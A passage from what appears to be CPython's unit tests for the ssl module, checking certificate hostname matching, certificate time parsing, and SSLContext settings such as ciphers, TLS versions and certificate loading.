(('commonName', 'mail.google.com'),))}
ok(cert, 'mail.google.com')
fail(cert, 'gmail.com')
# Only commonName is considered
fail(cert, 'California')
# -- IPv4 matching --
cert = {'subject': ((('commonName', 'example.com'),),),
'subjectAltName': (('DNS', 'example.com'),
('IP Address', '10.11.12.13'),
('IP Address', '14.15.16.17'),
('IP Address', '127.0.0.1'))}
ok(cert, '10.11.12.13')
ok(cert, '14.15.16.17')
# socket.inet_ntoa(socket.inet_aton('127.1')) == '127.0.0.1'
fail(cert, '127.1')
fail(cert, '14.15.16.17 ')
fail(cert, '14.15.16.17 extra data')
fail(cert, '14.15.16.18')
fail(cert, 'example.net')
# -- IPv6 matching --
if socket_helper.IPV6_ENABLED:
cert = {'subject': ((('commonName', 'example.com'),),),
'subjectAltName': (
('DNS', 'example.com'),
('IP Address', '2001:0:0:0:0:0:0:CAFE\n'),
('IP Address', '2003:0:0:0:0:0:0:BABA\n'))}
ok(cert, '2001::cafe')
ok(cert, '2003::baba')
fail(cert, '2003::baba ')
fail(cert, '2003::baba extra data')
fail(cert, '2003::bebe')
fail(cert, 'example.net')
# -- Miscellaneous --
# Neither commonName nor subjectAltName
cert = {'notAfter': 'Dec 18 23:59:59 2011 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),))}
fail(cert, 'mail.google.com')
# No DNS entry in subjectAltName but a commonName
cert = {'notAfter': 'Dec 18 23:59:59 2099 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('commonName', 'mail.google.com'),)),
'subjectAltName': (('othername', 'blabla'), )}
ok(cert, 'mail.google.com')
# No DNS entry subjectAltName and no commonName
cert = {'notAfter': 'Dec 18 23:59:59 2099 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),)),
'subjectAltName': (('othername', 'blabla'),)}
fail(cert, 'google.com')
# Empty cert / no cert
self.assertRaises(ValueError, ssl.match_hostname, None, 'example.com')
self.assertRaises(ValueError, ssl.match_hostname, {}, 'example.com')
# Issue #17980: avoid denials of service by refusing more than one
# wildcard per fragment.
cert = {'subject': ((('commonName', 'a*b.example.com'),),)}
with self.assertRaisesRegex(
ssl.CertificateError,
"partial wildcards in leftmost label are not supported"):
ssl.match_hostname(cert, 'axxb.example.com')
cert = {'subject': ((('commonName', 'www.*.example.com'),),)}
with self.assertRaisesRegex(
ssl.CertificateError,
"wildcard can only be present in the leftmost label"):
ssl.match_hostname(cert, 'www.sub.example.com')
cert = {'subject': ((('commonName', 'a*b*.example.com'),),)}
with self.assertRaisesRegex(
ssl.CertificateError,
"too many wildcards"):
ssl.match_hostname(cert, 'axxbxxc.example.com')
cert = {'subject': ((('commonName', '*'),),)}
with self.assertRaisesRegex(
ssl.CertificateError,
"sole wildcard without additional labels are not support"):
ssl.match_hostname(cert, 'host')
cert = {'subject': ((('commonName', '*.com'),),)}
with self.assertRaisesRegex(
ssl.CertificateError,
r"hostname 'com' doesn't match '\*.com'"):
ssl.match_hostname(cert, 'com')
# extra checks for _inet_paton()
for invalid in ['1', '', '1.2.3', '256.0.0.1', '127.0.0.1/24']:
with self.assertRaises(ValueError):
ssl._inet_paton(invalid)
for ipaddr in ['127.0.0.1', '192.168.0.1']:
self.assertTrue(ssl._inet_paton(ipaddr))
if socket_helper.IPV6_ENABLED:
for ipaddr in ['::1', '2001:db8:85a3::8a2e:370:7334']:
self.assertTrue(ssl._inet_paton(ipaddr))
def test_server_side(self):
# server_hostname doesn't work for server sockets
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
with socket.socket() as sock:
self.assertRaises(ValueError, ctx.wrap_socket, sock, True,
server_hostname="some.hostname")
def test_unknown_channel_binding(self):
# should raise ValueError for unknown type
s = socket.create_server(('127.0.0.1', 0))
c = socket.socket(socket.AF_INET)
c.connect(s.getsockname())
with test_wrap_socket(c, do_handshake_on_connect=False) as ss:
with self.assertRaises(ValueError):
ss.get_channel_binding("unknown-type")
s.close()
@unittest.skipUnless("tls-unique" in ssl.CHANNEL_BINDING_TYPES,
"'tls-unique' channel binding not available")
def test_tls_unique_channel_binding(self):
# unconnected should return None for known type
s = socket.socket(socket.AF_INET)
with test_wrap_socket(s) as ss:
self.assertIsNone(ss.get_channel_binding("tls-unique"))
# the same for server-side
s = socket.socket(socket.AF_INET)
with test_wrap_socket(s, server_side=True, certfile=CERTFILE) as ss:
self.assertIsNone(ss.get_channel_binding("tls-unique"))
def test_dealloc_warn(self):
ss = test_wrap_socket(socket.socket(socket.AF_INET))
r = repr(ss)
with self.assertWarns(ResourceWarning) as cm:
ss = None
support.gc_collect()
self.assertIn(r, str(cm.warning.args[0]))
def test_get_default_verify_paths(self):
paths = ssl.get_default_verify_paths()
self.assertEqual(len(paths), 6)
self.assertIsInstance(paths, ssl.DefaultVerifyPaths)
with os_helper.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
paths = ssl.get_default_verify_paths()
self.assertEqual(paths.cafile, CERTFILE)
self.assertEqual(paths.capath, CAPATH)
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_enum_certificates(self):
self.assertTrue(ssl.enum_certificates("CA"))
self.assertTrue(ssl.enum_certificates("ROOT"))
self.assertRaises(TypeError, ssl.enum_certificates)
self.assertRaises(WindowsError, ssl.enum_certificates, "")
trust_oids = set()
for storename in ("CA", "ROOT"):
store = ssl.enum_certificates(storename)
self.assertIsInstance(store, list)
for element in store:
self.assertIsInstance(element, tuple)
self.assertEqual(len(element), 3)
cert, enc, trust = element
self.assertIsInstance(cert, bytes)
self.assertIn(enc, {"x509_asn", "pkcs_7_asn"})
self.assertIsInstance(trust, (frozenset, set, bool))
if isinstance(trust, (frozenset, set)):
trust_oids.update(trust)
serverAuth = "1.3.6.1.5.5.7.3.1"
self.assertIn(serverAuth, trust_oids)
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_enum_crls(self):
self.assertTrue(ssl.enum_crls("CA"))
self.assertRaises(TypeError, ssl.enum_crls)
self.assertRaises(WindowsError, ssl.enum_crls, "")
crls = ssl.enum_crls("CA")
self.assertIsInstance(crls, list)
for element in crls:
self.assertIsInstance(element, tuple)
self.assertEqual(len(element), 2)
self.assertIsInstance(element[0], bytes)
self.assertIn(element[1], {"x509_asn", "pkcs_7_asn"})
def test_asn1object(self):
expected = (129, 'serverAuth', 'TLS Web Server Authentication',
'1.3.6.1.5.5.7.3.1')
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.1')
self.assertEqual(val, expected)
self.assertEqual(val.nid, 129)
self.assertEqual(val.shortname, 'serverAuth')
self.assertEqual(val.longname, 'TLS Web Server Authentication')
self.assertEqual(val.oid, '1.3.6.1.5.5.7.3.1')
self.assertIsInstance(val, ssl._ASN1Object)
self.assertRaises(ValueError, ssl._ASN1Object, 'serverAuth')
val = ssl._ASN1Object.fromnid(129)
self.assertEqual(val, expected)
self.assertIsInstance(val, ssl._ASN1Object)
self.assertRaises(ValueError, ssl._ASN1Object.fromnid, -1)
with self.assertRaisesRegex(ValueError, "unknown NID 100000"):
ssl._ASN1Object.fromnid(100000)
for i in range(1000):
try:
obj = ssl._ASN1Object.fromnid(i)
except ValueError:
pass
else:
self.assertIsInstance(obj.nid, int)
self.assertIsInstance(obj.shortname, str)
self.assertIsInstance(obj.longname, str)
self.assertIsInstance(obj.oid, (str, type(None)))
val = ssl._ASN1Object.fromname('TLS Web Server Authentication')
self.assertEqual(val, expected)
self.assertIsInstance(val, ssl._ASN1Object)
self.assertEqual(ssl._ASN1Object.fromname('serverAuth'), expected)
self.assertEqual(ssl._ASN1Object.fromname('1.3.6.1.5.5.7.3.1'),
expected)
with self.assertRaisesRegex(ValueError, "unknown object 'serverauth'"):
ssl._ASN1Object.fromname('serverauth')
def test_purpose_enum(self):
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.1')
self.assertIsInstance(ssl.Purpose.SERVER_AUTH, ssl._ASN1Object)
self.assertEqual(ssl.Purpose.SERVER_AUTH, val)
self.assertEqual(ssl.Purpose.SERVER_AUTH.nid, 129)
self.assertEqual(ssl.Purpose.SERVER_AUTH.shortname, 'serverAuth')
self.assertEqual(ssl.Purpose.SERVER_AUTH.oid,
'1.3.6.1.5.5.7.3.1')
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.2')
self.assertIsInstance(ssl.Purpose.CLIENT_AUTH, ssl._ASN1Object)
self.assertEqual(ssl.Purpose.CLIENT_AUTH, val)
self.assertEqual(ssl.Purpose.CLIENT_AUTH.nid, 130)
self.assertEqual(ssl.Purpose.CLIENT_AUTH.shortname, 'clientAuth')
self.assertEqual(ssl.Purpose.CLIENT_AUTH.oid,
'1.3.6.1.5.5.7.3.2')
def test_unsupported_dtls(self):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.addCleanup(s.close)
with self.assertRaises(NotImplementedError) as cx:
test_wrap_socket(s, cert_reqs=ssl.CERT_NONE)
self.assertEqual(str(cx.exception), "only stream sockets are supported")
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
with self.assertRaises(NotImplementedError) as cx:
ctx.wrap_socket(s)
self.assertEqual(str(cx.exception), "only stream sockets are supported")
def cert_time_ok(self, timestring, timestamp):
self.assertEqual(ssl.cert_time_to_seconds(timestring), timestamp)
def cert_time_fail(self, timestring):
with self.assertRaises(ValueError):
ssl.cert_time_to_seconds(timestring)
@unittest.skipUnless(utc_offset(),
'local time needs to be different from UTC')
def test_cert_time_to_seconds_timezone(self):
# Issue #19940: ssl.cert_time_to_seconds() returns wrong
# results if local timezone is not UTC
self.cert_time_ok("May 9 00:00:00 2007 GMT", 1178668800.0)
self.cert_time_ok("Jan 5 09:34:43 2018 GMT", 1515144883.0)
def test_cert_time_to_seconds(self):
timestring = "Jan 5 09:34:43 2018 GMT"
ts = 1515144883.0
self.cert_time_ok(timestring, ts)
# accept keyword parameter, assert its name
self.assertEqual(ssl.cert_time_to_seconds(cert_time=timestring), ts)
# accept both %e and %d (space or zero generated by strftime)
self.cert_time_ok("Jan 05 09:34:43 2018 GMT", ts)
# case-insensitive
self.cert_time_ok("JaN 5 09:34:43 2018 GmT", ts)
self.cert_time_fail("Jan 5 09:34 2018 GMT") # no seconds
self.cert_time_fail("Jan 5 09:34:43 2018") # no GMT
self.cert_time_fail("Jan 5 09:34:43 2018 UTC") # not GMT timezone
self.cert_time_fail("Jan 35 09:34:43 2018 GMT") # invalid day
self.cert_time_fail("Jon 5 09:34:43 2018 GMT") # invalid month
self.cert_time_fail("Jan 5 24:00:00 2018 GMT") # invalid hour
self.cert_time_fail("Jan 5 09:60:43 2018 GMT") # invalid minute
newyear_ts = 1230768000.0
# leap seconds
self.cert_time_ok("Dec 31 23:59:60 2008 GMT", newyear_ts)
# same timestamp
self.cert_time_ok("Jan 1 00:00:00 2009 GMT", newyear_ts)
self.cert_time_ok("Jan 5 09:34:59 2018 GMT", 1515144899)
# allow 60th second (even if it is not a leap second)
self.cert_time_ok("Jan 5 09:34:60 2018 GMT", 1515144900)
# allow 2nd leap second for compatibility with time.strptime()
self.cert_time_ok("Jan 5 09:34:61 2018 GMT", 1515144901)
self.cert_time_fail("Jan 5 09:34:62 2018 GMT") # invalid seconds
# no special treatment for the special value:
# 99991231235959Z (rfc 5280)
self.cert_time_ok("Dec 31 23:59:59 9999 GMT", 253402300799.0)
@support.run_with_locale('LC_ALL', '')
def test_cert_time_to_seconds_locale(self):
# `cert_time_to_seconds()` should be locale independent
def local_february_name():
return time.strftime('%b', (1, 2, 3, 4, 5, 6, 0, 0, 0))
if local_february_name().lower() == 'feb':
self.skipTest("locale-specific month name needs to be "
"different from C locale")
# locale-independent
self.cert_time_ok("Feb 9 00:00:00 2007 GMT", 1170979200.0)
self.cert_time_fail(local_february_name() + " 9 00:00:00 2007 GMT")
def test_connect_ex_error(self):
server = socket.socket(socket.AF_INET)
self.addCleanup(server.close)
port = socket_helper.bind_port(server) # Reserve port but don't listen
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED)
self.addCleanup(s.close)
rc = s.connect_ex((HOST, port))
# Issue #19919: Windows machines or VMs hosted on Windows
# machines sometimes return EWOULDBLOCK.
errors = (
errno.ECONNREFUSED, errno.EHOSTUNREACH, errno.ETIMEDOUT,
errno.EWOULDBLOCK,
)
self.assertIn(rc, errors)
def test_read_write_zero(self):
# empty reads and writes now work, bpo-42854, bpo-31711
client_context, server_context, hostname = testing_context()
server = ThreadedEchoServer(context=server_context)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertEqual(s.recv(0), b"")
self.assertEqual(s.send(b""), 0)
class ContextTests(unittest.TestCase):
def test_constructor(self):
for protocol in PROTOCOLS:
with warnings_helper.check_warnings():
ctx = ssl.SSLContext(protocol)
self.assertEqual(ctx.protocol, protocol)
with warnings_helper.check_warnings():
ctx = ssl.SSLContext()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS)
self.assertRaises(ValueError, ssl.SSLContext, -1)
self.assertRaises(ValueError, ssl.SSLContext, 42)
def test_ciphers(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.set_ciphers("ALL")
ctx.set_ciphers("DEFAULT")
with self.assertRaisesRegex(ssl.SSLError, "No cipher can be selected"):
ctx.set_ciphers("^$:,;?*'dorothyx")
@unittest.skipUnless(PY_SSL_DEFAULT_CIPHERS == 1,
"Test applies only to Python default ciphers")
def test_python_ciphers(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ciphers = ctx.get_ciphers()
for suite in ciphers:
name = suite['name']
self.assertNotIn("PSK", name)
self.assertNotIn("SRP", name)
self.assertNotIn("MD5", name)
self.assertNotIn("RC4", name)
self.assertNotIn("3DES", name)
def test_get_ciphers(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.set_ciphers('AESGCM')
names = set(d['name'] for d in ctx.get_ciphers())
self.assertIn('AES256-GCM-SHA384', names)
self.assertIn('AES128-GCM-SHA256', names)
def test_options(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
# OP_ALL | OP_NO_SSLv2 | OP_NO_SSLv3 is the default value
default = (ssl.OP_ALL | ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3)
# SSLContext also enables these by default
default |= (OP_NO_COMPRESSION | OP_CIPHER_SERVER_PREFERENCE |
OP_SINGLE_DH_USE | OP_SINGLE_ECDH_USE |
OP_ENABLE_MIDDLEBOX_COMPAT |
OP_IGNORE_UNEXPECTED_EOF)
self.assertEqual(default, ctx.options)
with warnings_helper.check_warnings():
ctx.options |= ssl.OP_NO_TLSv1
self.assertEqual(default | ssl.OP_NO_TLSv1, ctx.options)
with warnings_helper.check_warnings():
ctx.options = (ctx.options & ~ssl.OP_NO_TLSv1)
self.assertEqual(default, ctx.options)
ctx.options = 0
# Ubuntu has OP_NO_SSLv3 forced on by default
self.assertEqual(0, ctx.options & ~ssl.OP_NO_SSLv3)
def test_verify_mode_protocol(self):
with warnings_helper.check_warnings():
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
# Default value
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
ctx.verify_mode = ssl.CERT_OPTIONAL
self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
ctx.verify_mode = ssl.CERT_REQUIRED
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.verify_mode = ssl.CERT_NONE
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
with self.assertRaises(TypeError):
ctx.verify_mode = None
with self.assertRaises(ValueError):
ctx.verify_mode = 42
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self.assertFalse(ctx.check_hostname)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertTrue(ctx.check_hostname)
def test_hostname_checks_common_name(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertTrue(ctx.hostname_checks_common_name)
if ssl.HAS_NEVER_CHECK_COMMON_NAME:
ctx.hostname_checks_common_name = True
self.assertTrue(ctx.hostname_checks_common_name)
ctx.hostname_checks_common_name = False
self.assertFalse(ctx.hostname_checks_common_name)
ctx.hostname_checks_common_name = True
self.assertTrue(ctx.hostname_checks_common_name)
else:
with self.assertRaises(AttributeError):
ctx.hostname_checks_common_name = True
@ignore_deprecation
def test_min_max_version(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# OpenSSL default is MINIMUM_SUPPORTED, however some vendors like
# Fedora override the setting to TLS 1.0.
minimum_range = {
# stock OpenSSL
ssl.TLSVersion.MINIMUM_SUPPORTED,
# Fedora 29 uses TLS 1.0 by default
ssl.TLSVersion.TLSv1,
# RHEL 8 uses TLS 1.2 by default
ssl.TLSVersion.TLSv1_2
}
maximum_range = {
# stock OpenSSL
ssl.TLSVersion.MAXIMUM_SUPPORTED,
# Fedora 32 uses TLS 1.3 by default
ssl.TLSVersion.TLSv1_3
}
self.assertIn(
ctx.minimum_version, minimum_range
)
self.assertIn(
ctx.maximum_version, maximum_range
)
ctx.minimum_version = ssl.TLSVersion.TLSv1_1
ctx.maximum_version = ssl.TLSVersion.TLSv1_2
self.assertEqual(
ctx.minimum_version, ssl.TLSVersion.TLSv1_1
)
self.assertEqual(
ctx.maximum_version, ssl.TLSVersion.TLSv1_2
)
ctx.minimum_version = ssl.TLSVersion.MINIMUM_SUPPORTED
ctx.maximum_version = ssl.TLSVersion.TLSv1
self.assertEqual(
ctx.minimum_version, ssl.TLSVersion.MINIMUM_SUPPORTED
)
self.assertEqual(
ctx.maximum_version, ssl.TLSVersion.TLSv1
)
ctx.maximum_version = ssl.TLSVersion.MAXIMUM_SUPPORTED
self.assertEqual(
ctx.maximum_version, ssl.TLSVersion.MAXIMUM_SUPPORTED
)
ctx.maximum_version = ssl.TLSVersion.MINIMUM_SUPPORTED
self.assertIn(
ctx.maximum_version,
{ssl.TLSVersion.TLSv1, ssl.TLSVersion.SSLv3}
)
ctx.minimum_version = ssl.TLSVersion.MAXIMUM_SUPPORTED
self.assertIn(
ctx.minimum_version,
{ssl.TLSVersion.TLSv1_2, ssl.TLSVersion.TLSv1_3}
)
with self.assertRaises(ValueError):
ctx.minimum_version = 42
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1_1)
self.assertIn(
ctx.minimum_version, minimum_range
)
self.assertEqual(
ctx.maximum_version, ssl.TLSVersion.MAXIMUM_SUPPORTED
)
with self.assertRaises(ValueError):
ctx.minimum_version = ssl.TLSVersion.MINIMUM_SUPPORTED
with self.assertRaises(ValueError):
ctx.maximum_version = ssl.TLSVersion.TLSv1
@unittest.skipUnless(
hasattr(ssl.SSLContext, 'security_level'),
"requires OpenSSL >= 1.1.0"
)
def test_security_level(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
# The default security callback allows for levels between 0-5
# with OpenSSL defaulting to 1, however some vendors override the
# default value (e.g. Debian defaults to 2)
security_level_range = {
0,
1, # OpenSSL default
2, # Debian
3,
4,
5,
}
self.assertIn(ctx.security_level, security_level_range)
def test_verify_flags(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# default value
tf = getattr(ssl, "VERIFY_X509_TRUSTED_FIRST", 0)
self.assertEqual(ctx.verify_flags, ssl.VERIFY_DEFAULT | tf)
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_LEAF
self.assertEqual(ctx.verify_flags, ssl.VERIFY_CRL_CHECK_LEAF)
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_CHAIN
self.assertEqual(ctx.verify_flags, ssl.VERIFY_CRL_CHECK_CHAIN)
ctx.verify_flags = ssl.VERIFY_DEFAULT
self.assertEqual(ctx.verify_flags, ssl.VERIFY_DEFAULT)
ctx.verify_flags = ssl.VERIFY_ALLOW_PROXY_CERTS
self.assertEqual(ctx.verify_flags, ssl.VERIFY_ALLOW_PROXY_CERTS)
# supports any value
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_LEAF | ssl.VERIFY_X509_STRICT
self.assertEqual(ctx.verify_flags,
ssl.VERIFY_CRL_CHECK_LEAF | ssl.VERIFY_X509_STRICT)
with self.assertRaises(TypeError):
ctx.verify_flags = None
def test_load_cert_chain(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# Combined key and cert in a single file
ctx.load_cert_chain(CERTFILE, keyfile=None)
ctx.load_cert_chain(CERTFILE, keyfile=CERTFILE)
self.assertRaises(TypeError, ctx.load_cert_chain, keyfile=CERTFILE)
with self.assertRaises(OSError) as cm:
ctx.load_cert_chain(NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(BADCERT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(EMPTYCERT)
# Separate key and cert
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.load_cert_chain(ONLYCERT, ONLYKEY)
ctx.load_cert_chain(certfile=ONLYCERT, keyfile=ONLYKEY)
ctx.load_cert_chain(certfile=BYTES_ONLYCERT, keyfile=BYTES_ONLYKEY)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(ONLYCERT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(ONLYKEY)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(certfile=ONLYKEY, keyfile=ONLYCERT)
# Mismatching key and cert
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
with self.assertRaisesRegex(ssl.SSLError, "key values mismatch"):
ctx.load_cert_chain(CAFILE_CACERT, ONLYKEY)
# Password protected key and cert
ctx.load_cert_chain(CERTFILE_PROTECTED, password=KEY_PASSWORD)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=KEY_PASSWORD.encode())
ctx.load_cert_chain(CERTFILE_PROTECTED,
password=bytearray(KEY_PASSWORD.encode()))
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED, KEY_PASSWORD)
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED, KEY_PASSWORD.encode())
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED,
bytearray(KEY_PASSWORD.encode()))
with self.assertRaisesRegex(TypeError, "should be a string"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=True)
with self.assertRaises(ssl.SSLError):
ctx.load_cert_chain(CERTFILE_PROTECTED, password="badpass")
with self.assertRaisesRegex(ValueError, "cannot be longer"):
# openssl has a fixed limit on the password buffer.
# PEM_BUFSIZE is generally set to 1kb.
# Return a string larger than this.
ctx.load_cert_chain(CERTFILE_PROTECTED, password=b'a' * 102400)
# Password callback
def getpass_unicode():
return KEY_PASSWORD
def getpass_bytes():
return KEY_PASSWORD.encode()
def getpass_bytearray():
return bytearray(KEY_PASSWORD.encode())
def getpass_badpass():
return "badpass"
def getpass_huge():
return b'a' * (1024 * 1024)
def getpass_bad_type():
return 9
def getpass_exception():
raise Exception('getpass error')
class GetPassCallable:
def __call__(self):
return KEY_PASSWORD
def getpass(self):
return KEY_PASSWORD
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_unicode)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bytes)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bytearray)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=GetPassCallable())
ctx.load_cert_chain(CERTFILE_PROTECTED,
password=GetPassCallable().getpass)
with self.assertRaises(ssl.SSLError):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_badpass)
with self.assertRaisesRegex(ValueError, "cannot be longer"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_huge)
with self.assertRaisesRegex(TypeError, "must return a string"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bad_type)
with self.assertRaisesRegex(Exception, "getpass error"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_exception)
# Make sure the password function isn't called if it isn't needed
ctx.load_cert_chain(CERTFILE, password=getpass_exception)
def test_load_verify_locations(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.load_verify_locations(CERTFILE)
ctx.load_verify_locations(cafile=CERTFILE, capath=None)
ctx.load_verify_locations(BYTES_CERTFILE)
ctx.load_verify_locations(cafile=BYTES_CERTFILE, capath=None)
self.assertRaises(TypeError, ctx.load_verify_locations)
self.assertRaises(TypeError, ctx.load_verify_locations, None, None, None)
with self.assertRaises(OSError) as cm:
ctx.load_verify_locations(NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_verify_locations(BADCERT)
ctx.load_verify_locations(CERTFILE, CAPATH)
ctx.load_verify_locations(CERTFILE, capath=BYTES_CAPATH)
# Issue #10989: crash if the second argument type is invalid
self.assertRaises(TypeError, ctx.load_verify_locations, None, True)
def test_load_verify_cadata(self):
# test cadata
with open(CAFILE_CACERT) as f:
cacert_pem = f.read()
cacert_der = ssl.PEM_cert_to_DER_cert(cacert_pem)
with open(CAFILE_NEURONIO) as f:
neuronio_pem = f.read()
neuronio_der = ssl.PEM_cert_to_DER_cert(neuronio_pem)
# test PEM
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 0)
ctx.load_verify_locations(cadata=cacert_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 1)
ctx.load_verify_locations(cadata=neuronio_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# cert already in hash table
ctx.load_verify_locations(cadata=neuronio_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# combined
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
combined = "\n".join((cacert_pem, neuronio_pem))
ctx.load_verify_locations(cadata=combined)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# with junk around the certs
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
combined = ["head", cacert_pem, "other", neuronio_pem, "again",
neuronio_pem, "tail"]
ctx.load_verify_locations(cadata="\n".join(combined))
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# test DER
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_verify_locations(cadata=cacert_der)
ctx.load_verify_locations(cadata=neuronio_der)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# cert already in hash table
ctx.load_verify_locations(cadata=cacert_der)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# combined
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
combined = b"".join((cacert_der, neuronio_der))
ctx.load_verify_locations(cadata=combined)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# error cases
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertRaises(TypeError, ctx.load_verify_locations, cadata=object)
with self.assertRaisesRegex(
ssl.SSLError,
"no start line: cadata does not contain a certificate"
):
ctx.load_verify_locations(cadata="broken")
with self.assertRaisesRegex(
ssl.SSLError,
"not enough data: cadata does not contain a certificate"
):
ctx.load_verify_locations(cadata=b"broken")
@unittest.skipIf(Py_DEBUG_WIN32, "Avoid mixing debug/release CRT on Windows")
def test_load_dh_params(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.load_dh_params(DHFILE)
if os.name != 'nt':
ctx.load_dh_params(BYTES_DHFILE)
self.assertRaises(TypeError, ctx.load_dh_params)
self.assertRaises(TypeError, ctx.load_dh_params, None)
with self.assertRaises(FileNotFoundError) as cm:
ctx.load_dh_params(NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(ssl.SSLError) as cm:
ctx.load_dh_params(CERTFILE)
def test_session_stats(self):
for proto in {ssl.PROTOCOL_TLS_CLIENT, ssl.PROTOCOL_TLS_SERVER}:
ctx = ssl.SSLContext(proto)
self.assertEqual(ctx.session_stats(), {
'number': 0,
'connect': 0,
'connect_good': 0,
'connect_renegotiate': 0,
'accept': 0,
'accept_good': 0,
'accept_renegotiate': 0,
'hits': 0,
'misses': 0,
'timeouts': 0,
'cache_full': 0,
})
def test_set_default_verify_paths(self):
# There's not much we can do to test that it acts as expected,
# so just check it doesn't crash or raise an exception.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.set_default_verify_paths()
@unittest.skipUnless(ssl.HAS_ECDH, "ECDH disabled on this OpenSSL build")
def test_set_ecdh_curve(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.set_ecdh_curve("prime256v1")
ctx.set_ecdh_curve(b"prime256v1")
self.assertRaises(TypeError, ctx.set_ecdh_curve)
self.assertRaises(TypeError, ctx.set_ecdh_curve, None)
self.assertRaises(ValueError, ctx.set_ecdh_curve, "foo")
self.assertRaises(ValueError, ctx.set_ecdh_curve, b"foo")
def test_sni_callback(self):
